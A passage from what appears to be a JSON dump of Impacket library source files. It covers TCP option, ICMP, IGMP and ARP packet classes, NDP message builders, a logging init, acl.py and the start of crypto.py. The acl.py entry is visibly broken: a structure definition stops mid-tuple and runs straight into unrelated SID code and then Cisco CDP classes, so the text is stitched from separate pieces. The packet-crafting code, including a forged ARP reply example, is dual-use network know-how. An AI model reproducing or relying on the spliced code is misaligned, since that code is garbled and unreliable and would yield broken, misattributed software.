retrieve timestamp from TCPOPT_TIMESTAMP option\")\n return self.get_long(2)\n\n def set_ts(self, ts):\n if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:\n raise ImpactPacketException(\"Can only set timestamp on TCPOPT_TIMESTAMP option\")\n self.set_long(2, ts)\n\n def get_ts_echo(self):\n if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:\n raise ImpactPacketException(\"Can only retrieve timestamp from TCPOPT_TIMESTAMP option\")\n return self.get_long(6)\n\n def set_ts_echo(self, ts):\n if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:\n raise ImpactPacketException(\"Can only set timestamp on TCPOPT_TIMESTAMP option\")\n self.set_long(6, ts)\n\n def __str__(self):\n map = { TCPOption.TCPOPT_EOL : \"End of List \",\n TCPOption.TCPOPT_NOP : \"No Operation \",\n TCPOption.TCPOPT_MAXSEG : \"Maximum Segment Size \",\n TCPOption.TCPOPT_WINDOW : \"Window Scale \",\n TCPOption.TCPOPT_TIMESTAMP : \"Timestamp \" }\n\n tmp_str = \"\\tTCP Option: \"\n op = self.get_kind()\n if op in map:\n tmp_str += map[op]\n else:\n tmp_str += \" kind: %d \" % op\n if op == TCPOption.TCPOPT_MAXSEG:\n tmp_str += \" MSS : %d \" % self.get_mss()\n elif op == TCPOption.TCPOPT_WINDOW:\n tmp_str += \" Shift Count: %d \" % self.get_shift_cnt()\n elif op == TCPOption.TCPOPT_TIMESTAMP:\n pass # TODO\n return tmp_str\n\nclass ICMP(Header):\n protocol = 1\n ICMP_ECHOREPLY = 0\n ICMP_UNREACH = 3\n ICMP_UNREACH_NET = 0\n ICMP_UNREACH_HOST = 1\n ICMP_UNREACH_PROTOCOL = 2\n ICMP_UNREACH_PORT = 3\n ICMP_UNREACH_NEEDFRAG = 4\n ICMP_UNREACH_SRCFAIL = 5\n ICMP_UNREACH_NET_UNKNOWN = 6\n ICMP_UNREACH_HOST_UNKNOWN = 7\n ICMP_UNREACH_ISOLATED = 8\n ICMP_UNREACH_NET_PROHIB = 9\n ICMP_UNREACH_HOST_PROHIB = 10\n ICMP_UNREACH_TOSNET = 11\n ICMP_UNREACH_TOSHOST = 12\n ICMP_UNREACH_FILTERPROHIB = 13\n ICMP_UNREACH_HOST_PRECEDENCE = 14\n ICMP_UNREACH_PRECEDENCE_CUTOFF = 15\n ICMP_SOURCEQUENCH = 4\n ICMP_REDIRECT = 5\n ICMP_REDIRECT_NET = 0\n ICMP_REDIRECT_HOST = 1\n ICMP_REDIRECT_TOSNET = 2\n ICMP_REDIRECT_TOSHOST = 3\n ICMP_ALTHOSTADDR = 6\n ICMP_ECHO = 8\n ICMP_ROUTERADVERT = 9\n ICMP_ROUTERSOLICIT = 10\n ICMP_TIMXCEED = 11\n ICMP_TIMXCEED_INTRANS = 0\n ICMP_TIMXCEED_REASS = 1\n ICMP_PARAMPROB = 12\n ICMP_PARAMPROB_ERRATPTR = 0\n ICMP_PARAMPROB_OPTABSENT = 1\n ICMP_PARAMPROB_LENGTH = 2\n ICMP_TSTAMP = 13\n ICMP_TSTAMPREPLY = 14\n ICMP_IREQ = 15\n ICMP_IREQREPLY = 16\n ICMP_MASKREQ = 17\n ICMP_MASKREPLY = 18\n\n def __init__(self, aBuffer = None):\n Header.__init__(self, 8)\n if aBuffer:\n self.load_header(aBuffer)\n\n def get_header_size(self):\n anamolies = { ICMP.ICMP_TSTAMP : 20, ICMP.ICMP_TSTAMPREPLY : 20, ICMP.ICMP_MASKREQ : 12, ICMP.ICMP_MASKREPLY : 12 }\n if self.get_icmp_type() in anamolies:\n return anamolies[self.get_icmp_type()]\n else:\n return 8\n\n def get_icmp_type(self):\n return self.get_byte(0)\n\n def set_icmp_type(self, aValue):\n self.set_byte(0, aValue)\n\n def get_icmp_code(self):\n return self.get_byte(1)\n\n def set_icmp_code(self, aValue):\n self.set_byte(1, aValue)\n\n def get_icmp_cksum(self):\n return self.get_word(2)\n\n def set_icmp_cksum(self, aValue):\n self.set_word(2, aValue)\n self.auto_checksum = 0\n\n def get_icmp_gwaddr(self):\n return self.get_ip_address(4)\n\n def set_icmp_gwaddr(self, ip):\n self.set_ip_address(4, ip)\n\n def get_icmp_id(self):\n return self.get_word(4)\n\n def set_icmp_id(self, aValue):\n self.set_word(4, aValue)\n\n def get_icmp_seq(self):\n return self.get_word(6)\n\n def set_icmp_seq(self, aValue):\n self.set_word(6, aValue)\n\n def get_icmp_void(self):\n return self.get_long(4)\n\n def set_icmp_void(self, aValue):\n self.set_long(4, aValue)\n\n\n def get_icmp_nextmtu(self):\n return self.get_word(6)\n\n def set_icmp_nextmtu(self, aValue):\n self.set_word(6, aValue)\n\n def get_icmp_num_addrs(self):\n return self.get_byte(4)\n\n def set_icmp_num_addrs(self, aValue):\n self.set_byte(4, aValue)\n\n def get_icmp_wpa(self):\n return self.get_byte(5)\n\n def set_icmp_wpa(self, aValue):\n self.set_byte(5, aValue)\n\n def get_icmp_lifetime(self):\n return self.get_word(6)\n\n def set_icmp_lifetime(self, aValue):\n self.set_word(6, aValue)\n\n def get_icmp_otime(self):\n return self.get_long(8)\n\n def set_icmp_otime(self, aValue):\n self.set_long(8, aValue)\n\n def get_icmp_rtime(self):\n return self.get_long(12)\n\n def set_icmp_rtime(self, aValue):\n self.set_long(12, aValue)\n\n def get_icmp_ttime(self):\n return self.get_long(16)\n\n def set_icmp_ttime(self, aValue):\n self.set_long(16, aValue)\n\n def get_icmp_mask(self):\n return self.get_ip_address(8)\n\n def set_icmp_mask(self, mask):\n self.set_ip_address(8, mask)\n\n\n def calculate_checksum(self):\n if self.auto_checksum and (not self.get_icmp_cksum()):\n buffer = self.get_buffer_as_string()\n data = self.get_data_as_string()\n if data:\n buffer += data\n\n tmp_array = array.array('B', buffer)\n self.set_icmp_cksum(self.compute_checksum(tmp_array))\n\n def get_type_name(self, aType):\n tmp_type = {0:'ECHOREPLY', 3:'UNREACH', 4:'SOURCEQUENCH',5:'REDIRECT', 6:'ALTHOSTADDR', 8:'ECHO', 9:'ROUTERADVERT', 10:'ROUTERSOLICIT', 11:'TIMXCEED', 12:'PARAMPROB', 13:'TSTAMP', 14:'TSTAMPREPLY', 15:'IREQ', 16:'IREQREPLY', 17:'MASKREQ', 18:'MASKREPLY', 30:'TRACEROUTE', 31:'DATACONVERR', 32:'MOBILE REDIRECT', 33:'IPV6 WHEREAREYOU', 34:'IPV6 IAMHERE', 35:'MOBILE REGREQUEST', 36:'MOBILE REGREPLY', 39:'SKIP', 40:'PHOTURIS'}\n answer = tmp_type.get(aType, 'UNKNOWN')\n return answer\n\n def get_code_name(self, aType, aCode):\n tmp_code = {3:['UNREACH NET', 'UNREACH HOST', 'UNREACH PROTOCOL', 'UNREACH PORT', 'UNREACH NEEDFRAG', 'UNREACH SRCFAIL', 'UNREACH NET UNKNOWN', 'UNREACH HOST UNKNOWN', 'UNREACH ISOLATED', 'UNREACH NET PROHIB', 'UNREACH HOST PROHIB', 'UNREACH TOSNET', 'UNREACH TOSHOST', 'UNREACH FILTER PROHIB', 'UNREACH HOST PRECEDENCE', 'UNREACH PRECEDENCE CUTOFF', 'UNKNOWN ICMP UNREACH']}\n tmp_code[5] = ['REDIRECT NET', 'REDIRECT HOST', 'REDIRECT TOSNET', 'REDIRECT TOSHOST']\n tmp_code[9] = ['ROUTERADVERT NORMAL', None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,'ROUTERADVERT NOROUTE COMMON']\n tmp_code[11] = ['TIMXCEED INTRANS ', 'TIMXCEED REASS']\n tmp_code[12] = ['PARAMPROB ERRATPTR ', 'PARAMPROB OPTABSENT', 'PARAMPROB LENGTH']\n tmp_code[40] = [None, 'PHOTURIS UNKNOWN INDEX', 'PHOTURIS AUTH FAILED', 'PHOTURIS DECRYPT FAILED']\n if aType in tmp_code:\n tmp_list = tmp_code[aType]\n if ((aCode + 1) > len(tmp_list)) or (not tmp_list[aCode]):\n return 'UNKNOWN'\n else:\n return tmp_list[aCode]\n else:\n return 'UNKNOWN'\n\n def __str__(self):\n tmp_type = self.get_icmp_type()\n tmp_code = self.get_icmp_code()\n tmp_str = 'ICMP type: ' + self.get_type_name(tmp_type)\n tmp_str+= ' code: ' + self.get_code_name(tmp_type, tmp_code)\n if self.child():\n tmp_str += '\\n' + str( self.child() )\n return tmp_str\n\n def isDestinationUnreachable(self):\n return self.get_icmp_type() == 3\n\n def isError(self):\n return not self.isQuery()\n\n def isHostUnreachable(self):\n return self.isDestinationUnreachable() and (self.get_icmp_code() == 1)\n\n def isNetUnreachable(self):\n return self.isDestinationUnreachable() and (self.get_icmp_code() == 0)\n\n def isPortUnreachable(self):\n return self.isDestinationUnreachable() and (self.get_icmp_code() == 3)\n\n def isProtocolUnreachable(self):\n return self.isDestinationUnreachable() and (self.get_icmp_code() == 2)\n\n def isQuery(self):\n tmp_dict = {8:'', 9:'', 10:'', 13:'', 14:'', 15:'', 16:'', 17:'', 18:''}\n return self.get_icmp_type() in tmp_dict\n\nclass IGMP(Header):\n protocol = 2\n def __init__(self, aBuffer = None):\n Header.__init__(self, 8)\n if aBuffer:\n self.load_header(aBuffer)\n\n def get_igmp_type(self):\n return self.get_byte(0)\n\n def set_igmp_type(self, aValue):\n self.set_byte(0, aValue)\n\n def get_igmp_code(self):\n return self.get_byte(1)\n\n def set_igmp_code(self, aValue):\n self.set_byte(1, aValue)\n\n def get_igmp_cksum(self):\n return self.get_word(2)\n\n def set_igmp_cksum(self, aValue):\n self.set_word(2, aValue)\n\n def get_igmp_group(self):\n return self.get_long(4)\n\n def set_igmp_group(self, aValue):\n self.set_long(4, aValue)\n\n def get_header_size(self):\n return 8\n\n def get_type_name(self, aType):\n tmp_dict = {0x11:'HOST MEMBERSHIP QUERY ', 0x12:'v1 HOST MEMBERSHIP REPORT ', 0x13:'IGMP DVMRP ', 0x14:' PIM ', 0x16:'v2 HOST MEMBERSHIP REPORT ', 0x17:'HOST LEAVE MESSAGE ', 0x1e:'MTRACE REPLY ', 0X1f:'MTRACE QUERY '}\n answer = tmp_dict.get(aType, 'UNKNOWN TYPE OR VERSION ')\n return answer\n\n def calculate_checksum(self):\n if self.auto_checksum and (not self.get_igmp_cksum()):\n self.set_igmp_cksum(self.compute_checksum(self.get_bytes()))\n\n def __str__(self):\n tmp_str = 'IGMP: ' + self.get_type_name(self.get_igmp_type())\n tmp_str += 'Group: ' + socket.inet_ntoa(struct.pack('!L',self.get_igmp_group()))\n if self.child():\n tmp_str += '\\n' + str(self.child())\n return tmp_str\n\n\n\nclass ARP(Header):\n ethertype = 0x806\n def __init__(self, aBuffer = None):\n Header.__init__(self, 7)\n if aBuffer:\n self.load_header(aBuffer)\n\n def get_ar_hrd(self):\n return self.get_word(0)\n\n def set_ar_hrd(self, aValue):\n self.set_word(0, aValue)\n\n def get_ar_pro(self):\n return self.get_word(2)\n\n def set_ar_pro(self, aValue):\n self.set_word(2, aValue)\n\n def get_ar_hln(self):\n return self.get_byte(4)\n\n def set_ar_hln(self, aValue):\n self.set_byte(4, aValue)\n\n def get_ar_pln(self):\n return self.get_byte(5)\n\n def set_ar_pln(self, aValue):\n self.set_byte(5, aValue)\n\n def get_ar_op(self):\n return self.get_word(6)\n\n def set_ar_op(self, aValue):\n self.set_word(6, aValue)\n\n def get_ar_sha(self):\n tmp_size = self.get_ar_hln()\n return self.get_bytes().tolist()[8: 8 + tmp_size]\n\n def set_ar_sha(self, aValue):\n for i in range(0, self.get_ar_hln()):\n self.set_byte(i + 8, aValue[i])\n\n def get_ar_spa(self):\n tmp_size = self.get_ar_pln()\n return self.get_bytes().tolist()[8 + self.get_ar_hln(): 8 + self.get_ar_hln() + tmp_size]\n\n def set_ar_spa(self, aValue):\n for i in range(0, self.get_ar_pln()):\n self.set_byte(i + 8 + self.get_ar_hln(), aValue[i])\n\n def get_ar_tha(self):\n tmp_size = self.get_ar_hln()\n tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln()\n return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size]\n\n def set_ar_tha(self, aValue):\n tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln()\n for i in range(0, self.get_ar_hln()):\n self.set_byte(i + tmp_from, aValue[i])\n\n def get_ar_tpa(self):\n tmp_size = self.get_ar_pln()\n tmp_from = 8 + ( 2 * self.get_ar_hln()) + self.get_ar_pln()\n return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size]\n\n def set_ar_tpa(self, aValue):\n tmp_from = 8 + (2 * self.get_ar_hln()) + self.get_ar_pln()\n for i in range(0, self.get_ar_pln()):\n self.set_byte(i + tmp_from, aValue[i])\n\n def get_header_size(self):\n return 8 + (2 * self.get_ar_hln()) + (2 * self.get_ar_pln())\n\n def get_op_name(self, ar_op):\n tmp_dict = {1:'REQUEST', 2:'REPLY', 3:'REVREQUEST', 4:'REVREPLY', 8:'INVREQUEST', 9:'INVREPLY'}\n answer = tmp_dict.get(ar_op, 'UNKNOWN')\n return answer\n\n def get_hrd_name(self, ar_hrd):\n tmp_dict = { 1:'ARPHRD ETHER', 6:'ARPHRD IEEE802', 15:'ARPHRD FRELAY'}\n answer = tmp_dict.get(ar_hrd, 'UNKNOWN')\n return answer\n\n\n def as_hrd(self, anArray):\n if not anArray:\n return ''\n tmp_str = '%x' % anArray[0]\n for i in range(1, len(anArray)):\n tmp_str += ':%x' % anArray[i]\n return tmp_str\n\n def as_pro(self, anArray):\n if not anArray:\n return ''\n tmp_str = '%d' % anArray[0]\n for i in range(1, len(anArray)):\n tmp_str += '.%d' % anArray[i]\n return tmp_str\n\n def __str__(self):\n tmp_op = self.get_ar_op()\n tmp_str = 'ARP format: ' + self.get_hrd_name(self.get_ar_hrd()) + ' '\n tmp_str += 'opcode: ' + self.get_op_name(tmp_op)\n tmp_str += '\\n' + self.as_hrd(self.get_ar_sha()) + ' -> '\n tmp_str += self.as_hrd(self.get_ar_tha())\n tmp_str += '\\n' + self.as_pro(self.get_ar_spa()) + ' -> '\n tmp_str += self.as_pro(self.get_ar_tpa())\n if self.child():\n tmp_str += '\\n' + str(self.child())\n return tmp_str\n\ndef example(): #To execute an example, remove this line\n a = Ethernet()\n b = ARP()\n c = Data('Hola loco!!!')\n b.set_ar_hln(6)\n b.set_ar_pln(4)\n #a.set_ip_dst('192.168.22.6')\n #a.set_ip_src('1.1.1.2')\n a.contains(b)\n b.contains(c)\n b.set_ar_op(2)\n b.set_ar_hrd(1)\n b.set_ar_spa((192, 168, 22, 6))\n b.set_ar_tpa((192, 168, 66, 171))\n a.set_ether_shost((0x0, 0xe0, 0x7d, 0x8a, 0xef, 0x3d))\n a.set_ether_dhost((0x0, 0xc0, 0xdf, 0x6, 0x5, 0xe))\n print(\"beto %s\" % a)\n" }, { "path": "impacket/NDP.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n\nimport array\nimport struct\n\nfrom impacket import ImpactPacket\nfrom impacket.ICMP6 import ICMP6\n\n\nclass NDP(ICMP6):\n #ICMP message type numbers\n ROUTER_SOLICITATION = 133\n ROUTER_ADVERTISEMENT = 134\n NEIGHBOR_SOLICITATION = 135\n NEIGHBOR_ADVERTISEMENT = 136\n REDIRECT = 137\n\n############################################################################\n# Append NDP Option helper\n\n def append_ndp_option(self, ndp_option):\n #As NDP inherits ICMP6, it is, in fact an ICMP6 \"header\"\n #The payload (where all NDP options should reside) is a child of the header\n self.child().get_bytes().extend(ndp_option.get_bytes())\n \n \n############################################################################\n @classmethod\n def Router_Solicitation(class_object):\n message_data = struct.pack('>L', 0) #Reserved bytes\n return class_object.__build_message(NDP.ROUTER_SOLICITATION, message_data)\n\n @classmethod\n def Router_Advertisement(class_object, current_hop_limit, \n managed_flag, other_flag, \n router_lifetime, reachable_time, retransmission_timer): \n flag_byte = 0x00\n if (managed_flag):\n flag_byte |= 0x80\n if (other_flag):\n flag_byte |= 0x40\n \n message_data = struct.pack('>BBHLL', current_hop_limit, flag_byte, router_lifetime, reachable_time, retransmission_timer)\n return class_object.__build_message(NDP.ROUTER_ADVERTISEMENT, message_data)\n\n @classmethod\n def Neighbor_Solicitation(class_object, target_address): \n message_data = struct.pack('>L', 0) #Reserved bytes\n message_data += ImpactPacket.array_tobytes(target_address.as_bytes())\n return class_object.__build_message(NDP.NEIGHBOR_SOLICITATION, message_data)\n\n\n @classmethod\n def Neighbor_Advertisement(class_object, router_flag, solicited_flag, override_flag, target_address): \n flag_byte = 0x00\n if (router_flag):\n flag_byte |= 0x80\n if (solicited_flag):\n flag_byte |= 0x40\n if (override_flag):\n flag_byte |= 0x20\n \n message_data = struct.pack('>BBBB', flag_byte, 0x00, 0x00, 0x00) #Flag byte and three reserved bytes\n message_data += ImpactPacket.array_tobytes(target_address.as_bytes())\n return class_object.__build_message(NDP.NEIGHBOR_ADVERTISEMENT, message_data)\n\n\n @classmethod\n def Redirect(class_object, target_address, destination_address): \n message_data = struct.pack('>L', 0)# Reserved bytes\n message_data += ImpactPacket.array_tobytes(target_address.as_bytes())\n message_data += ImpactPacket.array_tobytes(destination_address.as_bytes())\n return class_object.__build_message(NDP.REDIRECT, message_data)\n\n \n @classmethod\n def __build_message(class_object, type, message_data):\n #Build NDP header\n ndp_packet = NDP()\n ndp_packet.set_type(type)\n ndp_packet.set_code(0)\n \n #Pack payload\n ndp_payload = ImpactPacket.Data()\n ndp_payload.set_data(message_data)\n ndp_packet.contains(ndp_payload)\n \n return ndp_packet\n\n\n \n \nclass NDP_Option():\n #NDP Option Type numbers\n SOURCE_LINK_LAYER_ADDRESS = 1\n TARGET_LINK_LAYER_ADDRESS = 2\n PREFIX_INFORMATION = 3\n REDIRECTED_HEADER = 4\n MTU_OPTION = 5\n \n############################################################################\n @classmethod \n #link_layer_address must have a size that is a multiple of 8 octets\n def Source_Link_Layer_Address(class_object, link_layer_address):\n return class_object.__Link_Layer_Address(NDP_Option.SOURCE_LINK_LAYER_ADDRESS, link_layer_address)\n\n @classmethod \n #link_layer_address must have a size that is a multiple of 8 octets\n def Target_Link_Layer_Address(class_object, link_layer_address):\n return class_object.__Link_Layer_Address(NDP_Option.TARGET_LINK_LAYER_ADDRESS, link_layer_address)\n\n @classmethod \n #link_layer_address must have a size that is a multiple of 8 octets\n def __Link_Layer_Address(class_object, option_type, link_layer_address):\n option_length = (len(link_layer_address) / 8) + 1\n option_data = ImpactPacket.array_tobytes(array.array(\"B\", link_layer_address))\n return class_object.__build_option(option_type, option_length, option_data)\n\n @classmethod\n #Note: if we upgraded to Python 2.6, we could use collections.namedtuples for encapsulating the arguments\n #ENHANCEMENT - Prefix could be an instance of IP6_Address \n def Prefix_Information(class_object, prefix_length, on_link_flag, autonomous_flag, valid_lifetime, preferred_lifetime, prefix):\n \n flag_byte = 0x00\n if (on_link_flag):\n flag_byte |= 0x80\n if (autonomous_flag):\n flag_byte |= 0x40\n \n option_data = struct.pack('>BBLL', prefix_length, flag_byte, valid_lifetime, preferred_lifetime)\n option_data += struct.pack('>L', 0) #Reserved bytes\n option_data += ImpactPacket.array_tobytes(array.array(\"B\", prefix))\n option_length = 4 \n return class_object.__build_option(NDP_Option.PREFIX_INFORMATION, option_length, option_data)\n \n \n @classmethod \n def Redirected_Header(class_object, original_packet):\n option_data = struct.pack('>BBBBBB', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)# Reserved bytes\n option_data += ImpactPacket.array_tobytes(array.array(\"B\", original_packet))\n option_length = (len(option_data) + 4) / 8 \n return class_object.__build_option(NDP_Option.REDIRECTED_HEADER, option_length, option_data)\n \n @classmethod \n def MTU(class_object, mtu):\n option_data = struct.pack('>BB', 0x00, 0x00)# Reserved bytes\n option_data += struct.pack('>L', mtu)\n option_length = 1\n return class_object.__build_option(NDP_Option.MTU_OPTION, option_length, option_data)\n\n\n @classmethod\n def __build_option(class_object, type, length, option_data):\n #Pack data\n data_bytes = struct.pack('>BB', type, length)\n data_bytes += option_data\n ndp_option = ImpactPacket.Data()\n ndp_option.set_data(data_bytes)\n \n return ndp_option\n" }, { "path": "impacket/__init__.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\n# Set default logging handler to avoid \"No handler found\" warnings.\nimport logging\ntry: # Python 2.7+\n from logging import NullHandler\nexcept ImportError:\n class NullHandler(logging.Handler):\n def emit(self, record):\n pass\n\n# All modules inside this library MUST use this logger (impacket)\n# It is up to the library consumer to do whatever is wanted \n# with the logger output. By default it is forwarded to the \n# upstream logger\n\nLOG = logging.getLogger(__name__)\nLOG.addHandler(NullHandler())\n" }, { "path": "impacket/acl.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Windows ACL (Access Control List) handling for SMB file permissions.\n# Provides structures and utilities for reading and modifying NTFS security descriptors.\n#\n# Author:\n# Gefen Altshuler (@gaffner)\n#\n\nfrom impacket.structure import Structure\nfrom impacket.dcerpc.v5 import lsad, lsat\nfrom impacket.dcerpc.v5.transport import SMBTransport\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.smb3structs import FileSecInformation, FILE_OPEN_REPARSE_POINT, GENERIC_ALL, READ_CONTROL\n\nimport struct\n\n# ACE FLAGS\nSMB_ACE_FLAG_OI = 0x1\nSMB_ACE_FLAG_CI = 0x2\nSMB_ACE_FLAG_IO = 0x8\nSMB_ACE_FLAG_NP = 0x4\nSMB_ACE_FLAG_I = 0x10\n\n# STANDARD RIGHTS\nSEC_INFO_STANDARD_WRITE = 0x8\nSEC_INFO_STANDARD_READ = 0x2\nSEC_INFO_STANDARD_DELETE = 0x1\n\n# SPECIFIC RIGHTS\nSEC_INFO_SPECIFIC_WRITE = 0x116\nSEC_INFO_SPECIFIC_EXECUTE = 0x20\nSEC_INFO_SPECIFIC_FULL = 0x1FF\n\n# COMBINED RIGHTS\nSEC_READ_RIGHT = 0x00120089\n\nSUPPORTED_PERMISSIONS = {\n \"R\": 0x00120089,\n \"W\": 0x00100116,\n \"D\": 0x00110000,\n \"X\": 0x00000020,\n \"F\": 0x001F01FF,\n}\n\n\n# NT User (DACL) ACL\nclass FileNTUser( Structure ):\n structure = (\n (\"Revision\", \"H\", self[\"Authority\"][4:6])[0]\n return \"-\".join(\n map(\n str,\n [\"S\", int( self[\"Revision\"] ), authority]\n + list( struct.unpack( \"<{}I\".format(int(n)), self[\"Subauthorities\"] ) ),\n )\n )\n\n @staticmethod\n def build_from_string(data):\n items = data.split( \"-\" )[1:] # delete the S prefix\n revision = int( items[0] )\n numAuth = int( items[1] )\n sub_length = len( items ) - 2 # minus the revision and numAuth\n subauthorities = struct.pack( \"<{}I\".format(sub_length), *tuple( map( int, items[2:] ) ) )\n raw_sid = (\n struct.pack( \"<2B\", revision, numAuth )\n + b\"\\x00\" * 5\n + struct.pack( \" 0\n self._transparent_bridge = (capabilities & 0x02) > 0\n self._source_route_bridge = (capabilities & 0x04) > 0\n self._switch = (capabilities & 0x08) > 0\n self._host = (capabilities & 0x10) > 0\n self._igmp_capable = (capabilities & 0x20) > 0\n self._repeater = (capabilities & 0x40) > 0\n\n def is_router(self):\n return self._router\n\n def is_transparent_bridge(self):\n return self._transparent_bridge\n\n def is_source_route_bridge(self):\n return self._source_route_bridge\n \n def is_switch(self):\n return self._switch\n\n def is_host(self):\n return self.is_host\n\n def is_igmp_capable(self):\n return self._igmp_capable\n \n def is_repeater(self):\n return self._repeater\n\n \n def __str__(self):\n return \"Capabilities:\" + self.get_capabilities()\n \n \nclass SoftVersion(CDPElement):\n Type = 5\n \n def get_type(self):\n return SoftVersion.Type\n \n def get_version(self):\n return CDPElement.get_data(self)\n\n def __str__(self):\n return \"Version:\" + self.get_version()\n\n \nclass Platform(CDPElement):\n Type = 6\n \n def get_type(self):\n return Platform.Type\n \n def get_platform(self):\n return CDPElement.get_data(self) \n\n def __str__(self):\n return \"Platform:%r\" % self.get_platform() \n \n\nclass IpPrefix(CDPElement):\n Type = 7\n \n def get_type(self):\n return IpPrefix .Type\n \n def get_ip_prefix(self):\n return CDPElement.get_ip_address(self, 4) \n\n def get_bits(self):\n return self.get_byte(8) \n \n def __str__(self):\n return \"IP Prefix/Gateway: %r/%d\" % (self.get_ip_prefix(), self.get_bits())\n \nclass ProtocolHello(CDPElement):\n Type = 8\n \n def get_type(self):\n return ProtocolHello.Type\n\n def get_master_ip(self):\n return self.get_ip_address(9)\n\n def get_version(self):\n return self.get_byte(17)\n\n def get_sub_version(self):\n return self.get_byte(18)\n\n def get_status(self):\n return self.get_byte(19)\n\n def get_cluster_command_mac(self):\n return array_tobytes(self.get_bytes())[20:20+6]\n \n def get_switch_mac(self):\n return array_tobytes(self.get_bytes())[28:28+6]\n \n def get_management_vlan(self):\n return self.get_word(36)\n\n def __str__(self):\n return \"\\n\\n\\nProcolHello: Master IP:%s version:%r subversion:%r status:%r Switch's Mac:%r Management VLAN:%r\" \\\n % (self.get_master_ip(), self.get_version(), self.get_sub_version(), self.get_status(), mac_to_string(self.get_switch_mac()), self.get_management_vlan())\n \nclass VTPManagementDomain(CDPElement):\n Type = 9\n \n def get_type(self):\n return VTPManagementDomain.Type\n \n def get_domain(self):\n return CDPElement.get_data(self) \n \n \nclass Duplex(CDPElement):\n Type = 0xb\n \n def get_type(self):\n return Duplex.Type\n \n def get_duplex(self):\n return CDPElement.get_data(self) \n \n def is_full_duplex(self):\n return self.get_duplex()==0x1\n \nclass VLAN(CDPElement):\n Type = 0xa\n \n def get_type(self):\n return VLAN.Type\n \n def get_vlan_number(self):\n return CDPElement.get_data(self)\n\n\n\nclass TrustBitmap(CDPElement):\n Type = 0x12\n \n def get_type(self):\n return TrustBitmap.Type\n\n def get_trust_bitmap(self):\n return self.get_data()\n\n def __str__(self):\n return \"TrustBitmap Trust Bitmap:%r\" % self.get_trust_bitmap()\n\nclass UntrustedPortCoS(CDPElement):\n Type = 0x13\n \n def get_type(self):\n return UntrustedPortCoS.Type\n\n def get_port_CoS(self):\n return self.get_data()\n\n def __str__(self):\n return \"UntrustedPortCoS port CoS %r\" % self.get_port_CoS()\n\nclass ManagementAddresses(Address):\n Type = 0x16\n \n def get_type(self):\n return ManagementAddresses.Type\n \nclass MTU(CDPElement):\n Type = 0x11\n \n def get_type(self):\n return MTU.Type\n \nclass SystemName(CDPElement):\n Type = 0x14\n \n def get_type(self):\n return SystemName.Type\n\nclass SystemObjectId(CDPElement):\n Type = 0x15\n \n def get_type(self):\n return SystemObjectId.Type\n\nclass SnmpLocation(CDPElement):\n Type = 0x17\n \n def get_type(self):\n return SnmpLocation.Type\n\n\nclass DummyCdpElement(CDPElement):\n Type = 0x99\n\n def get_type(self):\n return DummyCdpElement.Type\n\nclass CDPElementFactory():\n \n elementTypeMap = {\n CDPDevice.Type : CDPDevice, \n Port.Type : Port,\n Capabilities.Type : Capabilities,\n Address.Type : Address, \n SoftVersion.Type : SoftVersion,\n Platform.Type : Platform,\n IpPrefix.Type : IpPrefix,\n ProtocolHello.Type : ProtocolHello,\n VTPManagementDomain.Type : VTPManagementDomain,\n VLAN.Type : VLAN,\n Duplex.Type : Duplex,\n TrustBitmap.Type : TrustBitmap,\n UntrustedPortCoS.Type : UntrustedPortCoS,\n ManagementAddresses.Type : ManagementAddresses,\n MTU.Type : MTU,\n SystemName.Type : SystemName,\n SystemObjectId.Type : SystemObjectId,\n SnmpLocation.Type : SnmpLocation\n }\n \n @classmethod\n def create(cls, aBuffer):\n# print \"CDPElementFactory.create aBuffer:\", repr(aBuffer)\n# print \"CDPElementFactory.create sub_type:\", repr(aBuffer[0:2])\n _type = unpack(\"!h\", aBuffer[0:2])[0]\n# print \"CDPElementFactory.create _type:\", _type\n try:\n class_type = cls.elementTypeMap[_type]\n except KeyError:\n class_type = DummyCdpElement\n #raise Exception(\"CDP Element type %s not implemented\" % _type)\n return class_type( aBuffer ) \n" }, { "path": "impacket/crypto.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)\n# RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)\n#\n# NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation\n# (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)\n#\n# [MS-LSAD] Section 5.1.2\n# [MS-SAMR] Section 2.2.11.1.1\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket import LOG\ntry:\n from Cryptodome.Cipher import DES, AES\nexcept Exception:\n LOG.error(\"Warning: You don't have any crypto installed. You need pycryptodomex\")\n LOG.error(\"See https://pypi.org/project/pycryptodomex/\")\nfrom struct import pack, unpack\nfrom impacket.structure import Structure\nimport hmac, hashlib\nfrom six import b\n\ndef Generate_Subkey(K):\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + Algorithm Generate_Subkey +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + +\n# + Input : K (128-bit key) +\n# + Output : K1 (128-bit first 